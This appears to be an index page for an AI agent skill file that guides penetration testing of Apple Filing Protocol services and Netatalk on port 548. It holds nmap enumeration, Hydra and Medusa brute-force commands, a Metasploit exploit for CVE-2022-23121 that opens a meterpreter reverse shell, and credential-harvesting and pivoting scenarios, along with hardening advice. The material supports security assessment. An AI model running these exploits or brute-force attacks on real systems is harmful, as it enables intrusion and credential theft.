OpenSkillIndex← back to search

Hacktricks-skills afp-pentest

Pentest Apple Filing Protocol (AFP) services on port 548. Use this skill whenever you need to enumerate, exploit, or assess AFP file sharing services, Netatalk daemons, NAS appliances (QNAP, Synology, WD, TrueNAS), or legacy macOS file servers. Trigger for any AFP-related tasks including vulnerability scanning, brute-force testing, Netatalk CVE exploitation (CVE-2022-23121, CVE-2018-1160, CVE-2022-22995), or defensive hardening recommendations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/584-pentesting-afp/SKILL.MD
source content

AFP Pentesting Skill

A comprehensive guide for testing Apple Filing Protocol (AFP) services, primarily targeting Netatalk implementations on NAS appliances and legacy macOS systems.

When to Use This Skill

Use this skill when you encounter:

  • Open port 548/tcp on a target
  • NAS devices (QNAP, Synology, Western Digital, TrueNAS)
  • Legacy macOS or Mac OS 9 file servers
  • Netatalk daemon installations
  • Time Machine over AFP configurations
  • Any AFP-related enumeration, exploitation, or hardening tasks

Quick Reference

ComponentDetails
ProtocolApple Filing Protocol (AFP)
Default Port548/tcp (AFP over TCP/DSI)
Common SoftwareNetatalk (open-source), macOS AFP service
Key CVEsCVE-2022-23121, CVE-2018-1160, CVE-2022-22995

Phase 1: Enumeration

Banner Grabbing & Server Info

Start with non-intrusive reconnaissance to identify the AFP server type and version:

# Metasploit auxiliary scanner
msfconsole -q
use auxiliary/scanner/afp/afp_server_info
set RHOSTS <target-ip>
run

# Nmap NSE scripts (comprehensive)
nmap -p 548 -sV --script "afp-* and not dos" <target-ip>

Nmap NSE Script Reference

ScriptPurpose
afp-ls
List available AFP volumes and files
afp-brute
Password brute-force against AFP login
afp-serverinfo
Dump server name, machine type, AFP version, supported UAMs
afp-showmount
List shares with their ACLs
afp-path-vuln
Detect directory-traversal (CVE-2010-0533)

Automated Enumeration Script

Use the bundled script for quick enumeration:

./scripts/enumerate_afp.sh <target-ip>

This runs all relevant NSE scripts and saves output to 

afp-enumeration-<ip>.txt
.

Brute-Force Testing

If credentials are needed, combine NSE with Hydra/Medusa:

# Hydra (recommended)
hydra -L users.txt -P passwords.txt afp://<target-ip>

# Medusa alternative
medusa -h <target-ip> -p 548 -u users.txt -P passwords.txt -e ns -M afp

Phase 2: Share Access & Interaction

Mounting AFP Shares

macOS:

# GUI: Finder → Go → Connect to Server → afp://<ip>/<share>
# Terminal:
mkdir /Volumes/afp
mount_afp afp://USER:PASSWORD@<ip>/SHARE /Volumes/afp

Linux (afpfs-ng):

# Install if needed
apt install afpfs-ng  # Debian/Ubuntu
yum install afpfs-ng  # RHEL/CentOS

# Mount share
mkdir /mnt/afp
mount_afp afp://USER:PASSWORD@<ip>/SHARE /mnt/afp

# Interactive client
afp_client <ip>

Important: Classic Mac resource-forks appear as hidden 

._*
AppleDouble files. These often contain metadata that standard DFIR tools miss. Always inspect them:

ls -la /mnt/afp/._*

Phase 3: Vulnerability Exploitation

CVE-2022-23121: Netatalk Unauthenticated RCE (CVSS 9.8)

Affected: Netatalk ≤ 3.1.12 Impact: Remote root code execution before authentication Common on: Western Digital PR4100, QNAP, Synology NAS

Metasploit Exploit:

msfconsole -q
use exploit/linux/netatalk/parse_entries
set RHOSTS <target-ip>
set TARGET 0  # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
set LHOST <your-ip>
run

Manual Check:

./scripts/check_netatalk_vulns.sh <target-ip>

CVE-2018-1160: Netatalk OpenSession Heap Overflow

Affected: Netatalk 3.0.0 - 3.1.11 Impact: Unauthenticated code execution via DSI OpenSession handler

Detection:

nmap -p 548 --script afp-serverinfo <target-ip>
# Look for Netatalk version in output

CVE-2022-22995: Symlink Redirection

Affected: Netatalk 3.1.0 - 3.1.17 (with AppleDouble v2 enabled) Impact: Arbitrary file write / RCE

CVE-2010-0533: Directory Traversal

Affected: Apple Mac OS X 10.6 AFP Detection:

nmap -p 548 --script afp-path-vuln <target-ip>

Phase 4: Defensive Recommendations

Immediate Actions

  1. Disable AFP unless strictly required. Use SMB3 or NFS instead.
  2. Upgrade Netatalk to ≥ 3.1.18 or 4.x (2024 release fixes multiple memory-safety bugs)
  3. Apply vendor firmware that back-ports 2022/2023/2024 patches

Hardening Checklist

  • Enforce strong UAMs (e.g., DHX2), disable clear-text authentication
  • Disable guest logins
  • Restrict TCP 548 to trusted subnets via firewall
  • Wrap AFP inside VPN when exposed remotely
  • Periodically scan with 
    nmap -p 548 --script afp-*
    in CI/CD

Monitoring

Add to your security monitoring:

# Cron job for periodic scanning
0 2 * * 0 nmap -p 548 --script afp-serverinfo <network-range> >> /var/log/afp-scan.log

Common Attack Scenarios

Scenario 1: NAS Discovery & Exploitation

  1. Scan for port 548: 
    nmap -p 548 <target>
  2. Enumerate: 
    ./scripts/enumerate_afp.sh <target>
  3. Check Netatalk version for CVE-2022-23121
  4. Exploit with Metasploit if vulnerable
  5. Pivot to internal network

Scenario 2: Credential Harvesting

  1. Mount AFP share with discovered credentials
  2. Extract 
    ._*
    AppleDouble files for metadata
  3. Look for password files, configs, backups
  4. Use credentials for lateral movement

Scenario 3: Legacy macOS Assessment

  1. Identify OS version via 
    afp-serverinfo
  2. Test for CVE-2010-0533 (directory traversal)
  3. Attempt brute-force with common Mac passwords
  4. Mount and enumerate file system

References

Notes

  • AFP has been superseded by SMB in macOS since OS X 10.9 (2013)
  • Most modern attacks target Netatalk on NAS appliances, not macOS
  • Always verify you have authorization before testing
  • Netatalk 4.x (2024) fixes multiple memory-safety bugs - recommend upgrading over patching individual CVEs